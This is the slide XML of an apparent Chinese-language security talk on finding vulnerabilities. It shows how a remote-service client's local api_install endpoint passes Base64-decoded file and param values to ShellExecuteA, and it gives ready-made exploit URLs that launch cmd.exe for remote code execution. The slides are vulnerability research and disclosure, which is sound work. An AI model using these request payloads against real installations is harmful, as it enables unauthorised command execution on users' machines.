                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>URL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>存在两个参数：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>file</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>param</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，这两个参数值会经过处理带入到</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ShellExecuteA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>中执行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2338054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某远程服务平台客户端</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4412C99C-B64E-592A-F6B6-50E345C90104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="403967" y="1673090"/>
            <a:ext cx="11384066" cy="4481445"/>
            <a:chOff x="356902" y="2130097"/>
            <a:chExt cx="11384066" cy="4481445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDAF1B9C-4EDC-7A68-D561-FF77C2EFF581}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="356902" y="2130097"/>
              <a:ext cx="11384066" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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访问：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>http://127.0.0.1:38230/api_install?file=cmd.exe&amp;param=/k%20notepad</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>OD</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>中下</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ShellExecuteA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的断点，带入的请求值确实会带入执行，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>file</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>为执行文件，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>param</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>为执行文件的参数。但这里通过栈内数据发现，参数值会经过处理。定位并跟进字符串的处理函数，会发现它就是逐个字符串进行转换，其实就是解码操作，对应了一张表，它就是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Base64</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的解码表。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"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408D3663-BD07-4D61-9963-14DB1F247035}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="785365" y="3429000"/>
              <a:ext cx="5419895" cy="1420749"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="图片 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCC3EE4-3DA3-24E2-D766-48E4D0741BB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="785365" y="5077088"/>
              <a:ext cx="5419895" cy="1129577"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图片 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755D8967-6D98-F13F-2F2D-24A1F9DD95EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6868941" y="3087955"/>
              <a:ext cx="4011468" cy="3523587"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3303285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某远程服务平台客户端</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AE84405A-B130-7A28-720F-FC214ECEBE0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2209800" y="1943430"/>
            <a:ext cx="7772400" cy="3663252"/>
            <a:chOff x="2209800" y="2130172"/>
            <a:chExt cx="7772400" cy="3663252"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文本框 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBD3203-13EA-33E7-379E-13330701558F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2130172"/>
              <a:ext cx="7772400" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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将file=cmd.exe、param=/k notepad，对应参数值进行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Base64</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>编码带入请求，即可实现</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:hlinkClick r:id="rId2">
                    <a:extLst>
                      <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                        <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                      </a:ext>
                    </a:extLst>
                  </a:hlinkClick>
                </a:rPr>
                <a:t>http://127.0.0.1:38230/api_install?file=Y21kLmV4ZQ==&amp;param=L2sgbm90ZXBhZA==</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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D3B69145-DCD2-48E2-0947-94359C73A01D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="3362634"/>
              <a:ext cx="7772400" cy="2430790"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE08CFAC-1BB2-22E1-FFBA-558566757A26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6646985" y="3175892"/>
            <a:ext cx="1500553" cy="7396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8520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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="16x9 元素.png" descr="16x9 元素.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94AFB912-68AC-2E76-E8E2-63AA0E5F11A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="294389" y="786362"/>
            <a:ext cx="746133" cy="901058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE75287-8E8E-C26B-2983-ACC2669AB247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306712" y="786362"/>
            <a:ext cx="5471881" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" kern="1200" spc="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="762000">
                    <a:srgbClr val="44DEC1">
                      <a:alpha val="5000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="28pt | 内容简介，关键词等等 Our businesses comprised core commerce, cloud computing, digital media and entertainment. We enable businesses to transform the way they market, sell, operate and improve their efficiencies.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42FC997-EC4E-33DE-7CEC-B7070B6BD66E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306712" y="2044609"/>
            <a:ext cx="5990200"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lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="EC6C01"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi R"/>
                <a:ea typeface="Alibaba PuHuiTi R"/>
                <a:cs typeface="Alibaba PuHuiTi R"/>
                <a:sym typeface="Alibaba PuHuiTi"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="just" defTabSz="914400" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>   议题介绍：介绍一下议题的大概内容。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="28pt | 内容简介，关键词等等 Our businesses comprised core commerce, cloud computing, digital media and entertainment. We enable businesses to transform the way they market, sell, operate and improve their efficiencies.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D2E8A15-125F-7CDE-225D-01CD39DFEE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306712" y="2915399"/>
            <a:ext cx="7608688" cy="882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lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="EC6C01"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi R"/>
                <a:ea typeface="Alibaba PuHuiTi R"/>
                <a:cs typeface="Alibaba PuHuiTi R"/>
                <a:sym typeface="Alibaba PuHuiTi"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just" defTabSz="914400" hangingPunct="1">
              <a:buAutoNum type="arabicPlain" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞挖掘案例：从基础到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的漏洞挖掘案例分享。        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="914400" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>经过脱敏及修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
